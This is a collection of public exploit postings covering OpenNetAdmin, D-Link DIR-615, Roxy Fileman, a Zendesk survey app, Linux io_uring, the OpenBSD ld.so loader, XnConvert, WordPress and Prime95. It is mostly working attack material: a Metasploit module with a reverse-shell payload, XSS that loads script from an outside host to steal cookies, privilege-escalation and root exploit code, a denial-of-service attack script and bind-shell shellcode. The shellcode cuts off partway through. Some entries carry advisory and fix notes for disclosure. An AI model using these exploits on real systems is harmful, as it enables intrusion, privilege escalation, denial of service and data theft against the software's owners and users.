class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::CmdStager def initialize(info = {}) super(update_info(info, 'Name' => 'OpenNetAdmin Ping Command Injection', 'Description' => %q{ This module exploits a command injection in OpenNetAdmin between 8.5.14 and 18.1.1. }, 'Author' => [ 'mattpascoe', # Vulnerability discovery 'Onur ER <onur@onurer.net>' # Metasploit module ], 'References' => [ ['EDB', '47691'] ], 'DisclosureDate' => '2019-11-19', 'License' => MSF_LICENSE, 'Platform' => 'linux', 'Arch' => [ARCH_X86, ARCH_X64], 'Privileged' => false, 'Targets' => [ ['Automatic Target', {}] ], 'DefaultOptions' => { 'RPORT' => 80, 'payload' => 'linux/x86/meterpreter/reverse_tcp' }, 'DefaultTarget' => 0)) register_options( [ OptString.new('VHOST', [false, 'HTTP server virtual host']), OptString.new('TARGETURI', [true, 'Base path', '/ona/login.php']) ] ) end def check res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path), 'ctype' => 'application/x-www-form-urlencoded', 'encode_params' => false, 'vars_post' => { 'xajax' => 'window_open', 'xajaxargs[]' => 'app_about' } }) unless res vprint_error 'Connection failed' return CheckCode::Unknown end unless res.body =~ /OpenNetAdmin/i return CheckCode::Safe end opennetadmin_version = res.body.scan(/OpenNetAdmin - v([\d\.]+)/).flatten.first version = Gem::Version.new('opennetadmin_version') if version vprint_status "OpenNetAdmin version #{version}" end if version >= Gem::Version.new('8.5.14') && version <= Gem::Version.new('18.1.1') return CheckCode::Appears end CheckCode::Detected end def exploit print_status('Exploiting...') execute_cmdstager(flavor: :printf) end def filter_bad_chars(cmd) cmd.gsub!(/chmod \+x/, 'chmod 777') end def execute_command(cmd, opts = {}) post_data = "xajax=window_submit&xajaxargs[]=tooltips&xajaxargs[]=ip%3D%3E;#{filter_bad_chars(cmd)};&xajaxargs[]=ping" begin send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path), 'ctype' => 'application/x-www-form-urlencoded', 'encode_params' => false, 'data' => post_data }) rescue ::Rex::ConnectionError fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server") end end end

# Exploit Title: D-Link DIR-615 Wireless Router  -  Persistent Cross-Site Scripting # Date: 2019-12-13 # Exploit Author: Sanyam Chawla # Vendor Homepage: http://www.dlink.co.in # Category: Hardware (Wi-fi Router) # Hardware Link: http://www.dlink.co.in/products/?pid=678 # Hardware Version: T1 # Firmware Version: 20.07 # Tested on: Windows 10 and Kali linux # CVE: CVE-2019-19742 Reproduction Steps: 1. Login to your wi-fi router gateway with admin credentials [i.e: http://192.168.0.1] 2. Go to Maintenance page and click on Admin on the left panel 3. Put blind xss Payload in to the name field “><script src=https://ptguy.xss.ht></script>. This payload saved by the server and its reflected in the user page. 4. Every refresh in the user home page, the blind XSS payload executes and sends data (IP, cookies, victim user agent) to the attacker. 5. For HTML injection just put <b> Testing </b> in username field, you will get the username bold in your homepage. #Burp Intercept POST /form2userconfig.cgi HTTP/1.1 Host: 192.168.0.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 180 Origin: http://192.168.0.1 Connection: close Referer: http://192.168.0.1/userconfig.htm Cookie: SessionID= Upgrade-Insecure-Requests: 1 username=*%22%3E%3Cscript%20src%3Dhttps%3A%2F%2Fptguy.xss.ht <http://2Fptguy.xss.ht>%3E%3C%2Fscript%3E*&privilege=2&newpass=pentesting&confpass=pentesting&adduser=Add&hiddenpass=&submit.htm%3Fuserconfig.htm=Send

# Exploit Title: D-Link DIR-615 - Privilege Escalation # Date: 2019-12-10 # Exploit Author: Sanyam Chawla # Vendor Homepage: http://www.dlink.co.in # Category: Hardware (Wi-fi Router) # Hardware Link: http://www.dlink.co.in/products/?pid=678 # Hardware Version: T1 # Firmware Version: 20.07 # Tested on: Windows 10 and Kali linux # CVE: CVE-2019-19743 # Reproduction Steps: # Login to your wi-fi router gateway with normal user credentials [i.e: http://192.168.0.1] # Go to the Maintenance page and click on Admin on the left panel. # There is an option to create a user and by default, it shows only user accounts. # Create an account with a name(i.e ptguy) and change the privileges from user to root(admin) # by changing privileges id (1 to 2) with burp suite. # Privilege Escalation Post Request POST /form2userconfig.cgi HTTP/1.1 Host: 192.168.0.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 122 Origin: http://192.168.0.1 Connection: close Referer: http://192.168.0.1/userconfig.htm Cookie: SessionID= Upgrade-Insecure-Requests: 1 username=ptguy&privilege=2&newpass=pentesting&confpass=pentesting&adduser=Add&hiddenpass=&submit.htm%3Fuserconfig.htm=Send # Now log in with newly created root (ptguy) user. You have all administrator rights.

# Exploit Title: Roxy Fileman 1.4.5 - Directory Traversal # Author: Patrik Lantz # Date: 2019-12-06 # Software: Roxy Fileman # Version: 1.4.5 # Vendor Homepage: http://www.roxyfileman.com/ # Software Link: http://www.roxyfileman.com/download.php?f=1.4.5-net # CVE: CVE-2019-19731 Tested on: ASP.NET 4.0.30319 and Microsoft-IIS 10.0, Windows 10 Pro Build 17134 (using custom account as application pool identity for the IIS worker process). =========================== Description =========================== Roxy Fileman 1.4.5 for .NET is vulnerable to path traversal which can lead to file write in arbitrary locations depending on the IIS worker process privileges. This PoC demonstrates a crafted Windows shortcut file being uploaded and written to the Startup folder. The execution of this file will be triggered on the next login. Proof of Concept =========================== It's possible to write an uploaded file to arbitrary locations using the RENAMEFILE action. The RenameFile function in main.ashx does not check if the new file name 'name' is a valid location. Moreover, the default conf.json has an incomplete blacklist for file extensions which in this case allows Windows shortcut files to be uploaded, alternatively existing files can be renamed to include the .lnk extension. 1) Create a shortcut file By using for example the target executable C:\Windows\System32\Calc.exe Remove the .lnk extension and rename it to use the .dat extension. 2) Upload the file Either upload the .dat file manually via the Roxy Fileman web interface or programmatically using a HTTP POST request. Details of the request: POST /wwwroot/fileman/asp_net/main.ashx?a=UPLOAD HTTP/1.1 Host: 127.0.0.1:50357 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------159382831523528 Content-Length: 924 Origin: http://127.0.0.1:50357 Connection: close Referer: http://127.0.0.1:50357/wwwroot/fileman/ Cookie: roxyld=%2Fwwwroot%2Ffileman%2FUploads%2Ftest2; roxyview=list -----------------------------159382831523528 Content-Disposition: form-data; name="action" upload -----------------------------159382831523528 Content-Disposition: form-data; name="method" ajax -----------------------------159382831523528 Content-Disposition: form-data; name="d" /wwwroot/fileman/Uploads/test2 -----------------------------159382831523528 Content-Disposition: form-data; name="files[]"; filename="poc.dat" Content-Type: application/octet-stream ...data omitted... -----------------------------159382831523528-- 3) Write the file to the Startup folder using the RENAMEFILE action The new filename is set via the n parameter. The correct path can be identified by trial and error depending on the location of wwwroot on the filesystem and the privileges for the IIS worker process (w3wp.exe). If the necessary directories do not exist, they can be created using the CREATEDIR action which also is vulnerable to path traversal. POST /wwwroot/fileman/asp_net/main.ashx?a=RENAMEFILE&f=%2Fwwwroot%2Ffileman%2FUploads%2FDocuments%2Fpoc.dat&n=../../../../../../../../AppData/Roaming/Microsoft/Windows/Start%20Menu/Programs/Startup/poc.txt.lnk HTTP/1.1 Host: 127.0.0.1:50357 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 66 Origin: http://127.0.0.1:50357 Connection: close Referer: http://127.0.0.1:50357/wwwroot/fileman/ Cookie: roxyld=%2Fwwwroot%2Ffileman%2FUploads%2Ftest2; roxyview=list f=%2Fwwwroot%2Ffileman%2FUploads%2Ftest2%2Fpoc.dat&n=poc.dat Workaround / Fix: =========================== Patch the main.ashx code in order to perform checks for all paths that they are valid in the following actions: CREATEDIR, COPYFILE and RENAMEFILE. Recommendations for users of Roxy Fileman: - Add lnk file extension to the conf.json under FORBIDDEN_UPLOADS, and aspx since it is not included in the blacklist by default. Timeline =========================== 2019-12-06: Discovered the vulnerability 2019-12-06: Reported to the vendor (vendor is unresponsive) 2019-12-11: Request CVE 2019-12-13: Advisory published Discovered By: =========================== Patrik Lantz

# Exploit Title: Zendesk App SweetHawk Survey 1.6 - Persistent Cross-Site Scripting # Date: 2019-12-17 # Exploit Author: MTK # Vendor Homepage: https://sweethawk.co/zendesk/survey-app # Software Link: https://www.zendesk.com/apps/support/survey/ # Version: Up to v1.6 # Tested on: Zendesk - Firefox/Windows # Software description: # Sweet Hawk Survey app ask customers for a 0-10 score instead of the normal good or bad question. # You can get more granular satisfaction data without compromising the response rate. # Ask an optional NPS question on the landing page. View reports and drill down into the response # detail and go directly to the ticket. Easy to set up, just replace the survey place holder in # your trigger or automation. Customize the landing pages for each of your brands. # Technical Details & Impact: # Attackers use vulnerable web pages to inject malicious code and have it stored on the web server # for later use. The payload is automatically served to users who browse web pages and executed in # their context. Thus, the victims do not need to click on a malicious link to run the payload. # All they have to do is visit a vulnerable web page. # POC 1. Open Support ticket in Zendesk and send XSS payload e.g; <script>alert(1);</script> 2. Generate survey request to rate the ticket and payload will execute; # Time line 09-19-2019 - Vulnerability discovered 09-20-2019 - Vendor contacted 12-02-2019 - Detailed report shared and full disclosure time line given with no response 12-17-2019 - Full Disclosure

Since commit 0fa03c624d8f ("io_uring: add support for sendmsg()", first in v5.3), io_uring has support for asynchronously calling sendmsg(). Unprivileged userspace tasks can submit IORING_OP_SENDMSG submission queue entries, which cause sendmsg() to be called either in syscall context in the original task, or - if that wasn't able to send a message without blocking - on a kernel worker thread. The problem is that sendmsg() can end up looking at the credentials of the calling task for various reasons; for example: - sendmsg() with non-null, non-abstract ->msg_name on an unconnected AF_UNIX datagram socket ends up performing filesystem access checks - sendmsg() with SCM_CREDENTIALS on an AF_UNIX socket ends up looking at process credentials - sendmsg() with non-null ->msg_name on an AF_NETLINK socket ends up performing capability checks against the calling process When the request has been handed off to a kernel worker task, all such checks are performed against the credentials of the worker - which are default kernel creds, with UID 0 and full capabilities. To force io_uring to hand off a request to a kernel worker thread, an attacker can abuse the fact that the opcode field of the SQE is read multiple times, with accesses to the struct msghdr in between: The attacker can first submit an SQE of type IORING_OP_RECVMSG whose struct msghdr is in a userfaultfd region, and then, when the userfaultfd triggers, switch the type to IORING_OP_SENDMSG. Here's a reproducer for Linux 5.3 that demonstrates the issue by adding an IPv4 address to the loopback interface without having the required privileges for that: ========================================================================== $ cat uring_sendmsg.c #define _GNU_SOURCE #include <pthread.h> #include <unistd.h> #include <stdio.h> #include <err.h> #include <sys/mman.h> #include <sys/syscall.h> #include <sys/socket.h> #include <sys/un.h> #include <sys/ioctl.h> #include <linux/rtnetlink.h> #include <linux/if_addr.h> #include <linux/io_uring.h> #include <linux/userfaultfd.h> #include <linux/netlink.h> #define SYSCHK(x) ({ \ typeof(x) __res = (x); \ if (__res == (typeof(x))-1) \ err(1, "SYSCHK(" #x ")"); \ __res; \ }) static int uffd = -1; static struct iovec *iov; static struct iovec real_iov; static struct io_uring_sqe *sqes; static void *uffd_thread(void *dummy) { struct uffd_msg msg; int res = SYSCHK(read(uffd, &msg, sizeof(msg))); if (res != sizeof(msg)) errx(1, "uffd read"); printf("got userfaultfd message\n"); sqes[0].opcode = IORING_OP_SENDMSG; union { struct iovec iov; char pad[0x1000]; } vec = { .iov = real_iov }; struct uffdio_copy copy = { .dst = (unsigned long)iov, .src = (unsigned long)&vec, .len = 0x1000 }; SYSCHK(ioctl(uffd, UFFDIO_COPY, &copy)); return NULL; } int main(void) { // initialize uring struct io_uring_params params = { }; int uring_fd = SYSCHK(syscall(SYS_io_uring_setup, /*entries=*/10, &params)); unsigned char *sq_ring = SYSCHK(mmap(NULL, 0x1000, PROT_READ|PROT_WRITE, MAP_SHARED, uring_fd, IORING_OFF_SQ_RING)); unsigned char *cq_ring = SYSCHK(mmap(NULL, 0x1000, PROT_READ|PROT_WRITE, MAP_SHARED, uring_fd, IORING_OFF_CQ_RING)); sqes = SYSCHK(mmap(NULL, 0x1000, PROT_READ|PROT_WRITE, MAP_SHARED, uring_fd, IORING_OFF_SQES)); // prepare userfaultfd-trapped IO vector page iov = SYSCHK(mmap(NULL, 0x1000, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0)); uffd = SYSCHK(syscall(SYS_userfaultfd, 0)); struct uffdio_api api = { .api = UFFD_API, .features = 0 }; SYSCHK(ioctl(uffd, UFFDIO_API, &api)); struct uffdio_register reg = { .mode = UFFDIO_REGISTER_MODE_MISSING, .range = { .start = (unsigned long)iov, .len = 0x1000 } }; SYSCHK(ioctl(uffd, UFFDIO_REGISTER, &reg)); pthread_t thread; if (pthread_create(&thread, NULL, uffd_thread, NULL)) errx(1, "pthread_create"); // construct netlink message int sock = SYSCHK(socket(AF_NETLINK, SOCK_DGRAM, NETLINK_ROUTE)); struct sockaddr_nl addr = { .nl_family = AF_NETLINK }; struct { struct nlmsghdr hdr; struct ifaddrmsg body; struct rtattr opthdr; unsigned char addr[4]; } __attribute__((packed)) msgbuf = { .hdr = { .nlmsg_len = sizeof(msgbuf), .nlmsg_type = RTM_NEWADDR, .nlmsg_flags = NLM_F_REQUEST }, .body = { .ifa_family = AF_INET, .ifa_prefixlen = 32, .ifa_flags = IFA_F_PERMANENT, .ifa_scope = 0, .ifa_index = 1 }, .opthdr = { .rta_len = sizeof(struct rtattr) + 4, .rta_type = IFA_LOCAL }, .addr = { 1, 2, 3, 4 } }; real_iov.iov_base = &msgbuf; real_iov.iov_len = sizeof(msgbuf); struct msghdr msg = { .msg_name = &addr, .msg_namelen = sizeof(addr), .msg_iov = iov, .msg_iovlen = 1, }; // send netlink message via uring sqes[0] = (struct io_uring_sqe) { .opcode = IORING_OP_RECVMSG, .fd = sock, .addr = (unsigned long)&msg }; ((int*)(sq_ring + params.sq_off.array))[0] = 0; (*(int*)(sq_ring + params.sq_off.tail))++; int submitted = SYSCHK(syscall(SYS_io_uring_enter, uring_fd, /*to_submit=*/1, /*min_complete=*/1, /*flags=*/IORING_ENTER_GETEVENTS, /*sig=*/NULL, /*sigsz=*/0)); printf("submitted %d, getevents done\n", submitted); int cq_tail = *(int*)(cq_ring + params.cq_off.tail); printf("cq_tail = %d\n", cq_tail); if (cq_tail != 1) errx(1, "expected cq_tail==1"); struct io_uring_cqe *cqe = (void*)(cq_ring + params.cq_off.cqes); if (cqe->res < 0) { printf("result: %d (%s)\n", cqe->res, strerror(-cqe->res)); } else { printf("result: %d\n", cqe->res); } } $ gcc -Wall -pthread -o uring_sendmsg uring_sendmsg.c $ ip addr show dev lo 1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000 link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00 inet 127.0.0.1/8 scope host lo valid_lft forever preferred_lft forever inet6 ::1/128 scope host valid_lft forever preferred_lft forever $ ./uring_sendmsg got userfaultfd message submitted 1, getevents done cq_tail = 1 result: 32 $ ip addr show dev lo 1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000 link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00 inet 127.0.0.1/8 scope host lo valid_lft forever preferred_lft forever inet 1.2.3.4/32 scope global lo valid_lft forever preferred_lft forever inet6 ::1/128 scope host valid_lft forever preferred_lft forever $ ========================================================================== The way I see it, the easiest way to fix this would probably be to grab a reference to the caller's credentials with get_current_cred() in io_uring_create(), then let the entry code of all the kernel worker threads permanently install these as their subjective credentials with override_creds(). (Or maybe commit_creds() - that would mean that you could actually see the owning user of these threads in the output of something like "ps aux". On the other hand, I'm not sure how that impacts stuff like signal sending, so override_creds() might be safer.) It would mean that you can't safely use an io_uring instance across something like a setuid() transition that drops privileges, but that's probably not a big problem? While the security bug was only introduced by the addition of IORING_OP_SENDMSG, it would probably be beneficial to mark such a change for backporting all the way to v5.1, when io_uring was added - I think e.g. the SELinux hook that is called from rw_verify_area() has so far always attributed all the I/O operations to the kernel context, which isn't really a security problem, but might e.g. cause unexpected denials depending on the SELinux policy.

Qualys Security Advisory Local Privilege Escalation in OpenBSD's dynamic loader (CVE-2019-19726) ============================================================================== Contents ============================================================================== Summary Analysis Demonstration Acknowledgments ============================================================================== Summary ============================================================================== We discovered a Local Privilege Escalation in OpenBSD's dynamic loader (ld.so): this vulnerability is exploitable in the default installation (via the set-user-ID executable chpass or passwd) and yields full root privileges. We developed a simple proof of concept and successfully tested it against OpenBSD 6.6 (the current release), 6.5, 6.2, and 6.1, on both amd64 and i386; other releases and architectures are probably also exploitable. ============================================================================== Analysis ============================================================================== In this section, we analyze a step-by-step execution of our proof of concept: ------------------------------------------------------------------------------ 1/ We execve() the set-user-ID /usr/bin/chpass, but first: 1a/ we set the LD_LIBRARY_PATH environment variable to one single dot (the current working directory) and approximately ARG_MAX colons (the maximum number of bytes for the argument and environment list); as described in man ld.so: LD_LIBRARY_PATH A colon separated list of directories, prepending the default search path for shared libraries. This variable is ignored for set-user-ID and set-group-ID executables. 1b/ we set the RLIMIT_DATA resource limit to ARG_MAX * sizeof(char *) (2MB on amd64, 1MB on i386); as described in man setrlimit: RLIMIT_DATA The maximum size (in bytes) of the data segment for a process; this includes memory allocated via malloc(3) and all other anonymous memory mapped via mmap(2). ------------------------------------------------------------------------------ 2/ Before the main() function of chpass is executed, the _dl_boot() function of ld.so is executed and calls _dl_setup_env(): 262 void 263 _dl_setup_env(const char *argv0, char **envp) 264 { ... 271 _dl_libpath = _dl_split_path(_dl_getenv("LD_LIBRARY_PATH", envp)); ... 283 _dl_trust = !_dl_issetugid(); 284 if (!_dl_trust) { /* Zap paths if s[ug]id... */ 285 if (_dl_libpath) { 286 _dl_free_path(_dl_libpath); 287 _dl_libpath = NULL; 288 _dl_unsetenv("LD_LIBRARY_PATH", envp); 289 } ------------------------------------------------------------------------------ 3/ At line 271, _dl_getenv() returns a pointer to our LD_LIBRARY_PATH environment variable and passes it to _dl_split_path(): 23 char ** 24 _dl_split_path(const char *searchpath) 25 { .. 35 pp = searchpath; 36 while (*pp) { 37 if (*pp == ':' || *pp == ';') 38 count++; 39 pp++; 40 } .. 45 retval = _dl_reallocarray(NULL, count, sizeof(*retval)); 46 if (retval == NULL) 47 return (NULL); ------------------------------------------------------------------------------ 4/ At line 45, count is approximately ARG_MAX (the number of colons in our LD_LIBRARY_PATH) and _dl_reallocarray() returns NULL (because of our low RLIMIT_DATA); at line 47, _dl_split_path() returns NULL. ------------------------------------------------------------------------------ 5/ As a result, _dl_libpath is NULL (line 271) and our LD_LIBRARY_PATH is ignored, but it is not deleted from the environment (CVE-2019-19726): although _dl_trust is false (_dl_issetugid() returns true because chpass is set-user-ID), _dl_unsetenv() is not called (line 288) because _dl_libpath is NULL (line 285). ------------------------------------------------------------------------------ 6/ Next, the main() function of chpass is executed, and it: 6a/ calls setuid(0), which sets the real and effective user IDs to 0; 6b/ calls pw_init(), which resets RLIMIT_DATA to RLIM_INFINITY; 6c/ calls pw_mkdb(), which vfork()s and execv()s /usr/sbin/pwd_mkdb (unlike execve(), execv() does not reset the environment). ------------------------------------------------------------------------------ 7/ Before the main() function of pwd_mkdb is executed, the _dl_boot() function of ld.so is executed and calls _dl_setup_env(): 7a/ at line 271, _dl_getenv() returns a pointer to our LD_LIBRARY_PATH environment variable (because it was not deleted from the environment in step 5, and because execv() did not reset the environment in step 6c); 7b/ at line 45, _dl_reallocarray() does not return NULL anymore (because our low RLIMIT_DATA was reset in step 6b); 7c/ as a result, _dl_libpath is not NULL (line 271), and it is not reset to NULL (line 287) because _dl_trust is true (_dl_issetugid() returns false because pwd_mkdb is not set-user-ID, and because the real and effective user IDs were both set to 0 in step 6a): our LD_LIBRARY_PATH is not ignored anymore. ------------------------------------------------------------------------------ 8/ Finally, ld.so searches for shared libraries in _dl_libpath (our LD_LIBRARY_PATH) and loads our own library from the current working directory (the dot in our LD_LIBRARY_PATH). ------------------------------------------------------------------------------ ============================================================================== Demonstration ============================================================================== In this section, we demonstrate the use of our proof of concept: ------------------------------------------------------------------------------ $ id uid=32767(nobody) gid=32767(nobody) groups=32767(nobody) $ cd /tmp $ cat > lib.c << "EOF" #include <paths.h> #include <unistd.h> static void __attribute__ ((constructor)) _init (void) { if (setuid(0) != 0) _exit(__LINE__); if (setgid(0) != 0) _exit(__LINE__); char * const argv[] = { _PATH_KSHELL, "-c", _PATH_KSHELL "; exit 1", NULL }; execve(argv[0], argv, NULL); _exit(__LINE__); } EOF $ readelf -a /usr/sbin/pwd_mkdb | grep NEEDED 0x0000000000000001 (NEEDED) Shared library: [libutil.so.13.1] 0x0000000000000001 (NEEDED) Shared library: [libc.so.95.1] $ gcc -fpic -shared -s -o libutil.so.13.1 lib.c $ cat > poc.c << "EOF" #include <string.h> #include <sys/param.h> #include <sys/resource.h> #include <unistd.h> int main(int argc, char * const * argv) { #define LLP "LD_LIBRARY_PATH=." static char llp[ARG_MAX - 128]; memset(llp, ':', sizeof(llp)-1); memcpy(llp, LLP, sizeof(LLP)-1); char * const envp[] = { llp, "EDITOR=echo '#' >>", NULL }; #define DATA (ARG_MAX * sizeof(char *)) const struct rlimit data = { DATA, DATA }; if (setrlimit(RLIMIT_DATA, &data) != 0) _exit(__LINE__); if (argc <= 1) _exit(__LINE__); argv += 1; execve(argv[0], argv, envp); _exit(__LINE__); } EOF $ gcc -s -o poc poc.c $ ./poc /usr/bin/chpass # id uid=0(root) gid=0(wheel) groups=32767(nobody) ------------------------------------------------------------------------------ ============================================================================== Acknowledgments ============================================================================== We thank Theo de Raadt and the OpenBSD developers for their incredibly quick response: they published a patch for this vulnerability in less than 3 hours. We also thank MITRE's CVE Assignment Team. [https://d1dejaj6dcqv24.cloudfront.net/asset/image/email-banner-384-2x.png]<https://www.qualys.com/email-banner> This message may contain confidential and privileged information. If it has been sent to you in error, please reply to advise the sender of the error and then immediately delete it. If you are not the intended recipient, do not read, copy, disclose or otherwise use this message. The sender disclaims any liability for such unauthorized use. NOTE that all incoming emails sent to Qualys email accounts will be archived and may be scanned by us and/or by external service providers to detect and prevent threats to our systems, investigate illegal or inappropriate behavior, and/or eliminate unsolicited promotional emails (“spam”). If you have any concerns about this process, please contact us.

# Exploit Title: XnConvert 1.82 - Denial of Service (PoC) # Date: 2019-12-21 # Vendor Homepage: https://www.xnview.com # Software Link: https://www.xnview.com/en/apps/ # Exploit Author: Gokkulraj (TwinTech Solutions) # Tested Version: v1.82 # Tested on: Windows 7 x64 # 1.- Download and install XnConvert # 2.- Run python code : XnConvert.py # 3.- Open EVIL.txt and copy content to clipboard # 4.- Open XnConvert and Click 'EnterKey' # 5.- Paste the content of EVIL.txt into the Field: 'User Name and Registration Code' # 6.- Click 'OK' and you will see a pop-up stating Invalid code and then click 'OK' you will see the crash. #!/usr/bin/env python Dos= "\x41" * 9000 myfile=open('Evil.txt','w') myfile.writelines(Dos) myfile.close() print("File created")

#!/usr/bin/env python # WordPress <= 5.3.? Denial-of-Service PoC # Abusing pingbacks+xmlrpc multicall to exhaust connections # @roddux 2019 | Arcturus Security | labs.arcturus.net # TODO: # - Try and detect a pingback URL on target site # - Optimise number of entries per request, check class-wp-xmlrpc-server.php from urllib.parse import urlparse import sys, uuid, urllib3, requests urllib3.disable_warnings() DEBUG = True def dprint(X): if DEBUG: print(X) COUNT=0 def build_entry(pingback,target): global COUNT COUNT +=1 entry = "<value><struct><member><name>methodName</name><value>pingback.ping</value></member><member>" entry += f"<name>params</name><value><array><data><value>{pingback}/{COUNT}</value>" #entry += f"<name>params</name><value><array><data><value>{pingback}/{uuid.uuid4()}</value>" entry += f"<value>{target}/?p=1</value></data></array></value></member></struct></value>" #entry += f"<value>{target}/#e</value></data></array></value></member></struct></value>" # taxes DB more return entry def build_request(pingback,target,entries): prefix = "<methodCall><methodName>system.multicall</methodName><params><param><array>" suffix = "</array></param></params></methodCall>" request = prefix for _ in range(0,entries): request += build_entry(pingback,target) request += suffix return request def usage_die(): print(f"[!] Usage: {sys.argv[0]} <check/attack> <pingback url> <target url>") exit(1) def get_args(): if len(sys.argv) != 4: usage_die() action = sys.argv[1] pingback = sys.argv[2] target = sys.argv[3] if action not in ("check","attack"): usage_die() for URL in (pingback,target): res = urlparse(URL) if not all((res.scheme,res.netloc)): usage_die() return (action,pingback,target) def main(action,pingback,target): print("[>] WordPress <= 5.3.? Denial-of-Service PoC") print("[>] @roddux 2019 | Arcturus Security | labs.arcturus.net") # he checc if action == "check": entries = 2 # he attacc elif action == "attack": entries = 2000 # but most importantly print(f"[+] Running in {action} mode") # he pingbacc print(f"[+] Got pingback URL \"{pingback}\"") print(f"[+] Got target URL \"{target}\"") print(f"[+] Building {entries} pingback calls") # entries = 1000 # TESTING xmldata = build_request(pingback,target,entries) dprint("[+] Request:\n") dprint(xmldata+"\n") print(f"[+] Request size: {len(xmldata)} bytes") if action == "attack": print("[+] Starting attack loop, CTRL+C to stop...") rcount = 0 try: while True: try: resp = requests.post(f"{target}/xmlrpc.php", xmldata, verify=False, allow_redirects=False, timeout=.2) #dprint(resp.content.decode("UTF-8")[0:500]+"\n") if resp.status_code != 200: print(f"[!] Received odd status ({resp.status_code}) -- DoS successful?") except (requests.exceptions.Timeout, requests.exceptions.ConnectionError) as e: pass rcount += 1 print(f"\r[+] Requests sent: {rcount}",end="") except KeyboardInterrupt: print("\n[>] Attack finished",end="\n\n") exit(0) elif action == "check": print("[+] Sending check request") try: resp = requests.post(f"{target}/xmlrpc.php", xmldata, verify=False, allow_redirects=False, timeout=10) if resp.status_code != 200: print(f"[!] Received odd status ({resp.status_code}) -- check target url") print("[+] Request sent") print("[+] Response headers:\n") print(resp.headers) print("[+] Response dump:") print(resp.content.decode("UTF-8")) print("[+] Here's the part where you figure out if it's vulnerable, because I CBA to code it") except (requests.exceptions.Timeout, requests.exceptions.ConnectionError) as e: print("[!] Connection error") exit(1) print("[>] Check finished") if __name__ == "__main__": main(*get_args())

# Exploit Title: Prime95 Version 29.8 build 6 - Buffer Overflow (SEH) # Date: 2019-12-22 # Vendor Homepage: https://www.mersenne.org # Software Link: http://www.mersenne.org/ftp_root/gimps/p95v298b6.win32.zip # Exploit Author: Achilles # Tested Version: 29.8 build 6 # Tested on: Windows 7 x64 # 1.- Run python code:Prime95.py # 2.- Open EVIL.txt and copy content to Clipboard # 3.- Open Prime95.exe go to PrimeNet # 4.- Paste the Content of EVIL.txt into the field "Optional User ID and Optional Computer Name" # 5.- Click Connection Paste the Content of EVIL.txt into the field "Option al proxy Host" # 6.- Press ok Twice and you will have a bind shell port 3110 # 7.- Greetings go:XiDreamzzXi,Metatron #!/usr/bin/env python import struct buffer =3D "\x41" * 660 nseh =3D "\xeb\x06\x90\x90" #jmp short 6 seh =3D struct.pack('<L',0x6ee410b1) #libhwloc-15.dll nops =3D "\x90" * 20 #msfvenom -a x86 --platform windows -p windows/shell_bind_tcp LPORT=3110 -e x86/shikata_ga_nai -b "\x00\x0a\x0d" -i 1 -f python #badchars "\x00\x0a\x0d" shellcode =3D ("\xb8\xf4\xc0\x2a\xd0\xdb\xd8\xd9\x74\x24\xf4\x5a\x2b"=20 "\xc9\xb1\x53\x31\x42\x12\x83\xea\xfc\x03\xb6\xce\xc8" "\x25\xca\x27\x8e\xc6\x32\xb8\xef\x4f\xd7\x89\x2f\x2b" "\x9c\xba\x9f\x3f\xf0\x36\x6b\x6d\xe0\xcd\x19\xba\x07" "\x65\x97\x9c\x26\x76\x84\xdd\x29\xf4\xd7\x31\x89\xc5" "\x17\x44\xc8\x02\x45\xa5\x98\xdb\x01\x18\x0c\x6f\x5f" "\xa1\xa7\x23\x71\xa1\x54\xf3\x70\x80\xcb\x8f\x2a\x02" "\xea\x5c\x47\x0b\xf4\x81\x62\xc5\x8f\x72\x18\xd4\x59" "\x4b\xe1\x7b\xa4\x63\x10\x85\xe1\x44\xcb\xf0\x1b\xb7" "\x76\x03\xd8\xc5\xac\x86\xfa\x6e\x26\x30\x26\x8e\xeb" "\xa7\xad\x9c\x40\xa3\xe9\x80\x57\x60\x82\xbd\xdc\x87" "\x44\x34\xa6\xa3\x40\x1c\x7c\xcd\xd1\xf8\xd3\xf2\x01" "\xa3\x8c\x56\x4a\x4e\xd8\xea\x11\x07\x2d\xc7\xa9\xd7" "\x39\x50\xda\xe5\xe6\xca\x74\x46\x6e\xd5\x83\xa9\x45" "\xa1\x1b\x54\x66\xd2\x32\x93\x32\x82\x2c\x32\x3b\x49" "\xac\xbb\xee\xe4\xa4\x1a\x41\x1b\x49\xdc\x31\x9b\xe1" "\xb5\x5b\x14\xde\xa6\x63\xfe\x77\x4e\x9e\x01\x7b\xa9" "\x17\xe7\xe9\xa5\x71\xbf\x85\x07\xa6\x08\x32\x77\x8c" "\x20\xd4\x30\xc6\xf7\xdb\xc0\xcc\x5f\x4b\x4b\x03\x64" "\x6a\x4c\x0e\xcc\xfb\xdb\xc4\x9d\x4e\x7d\xd8\xb7\x38" 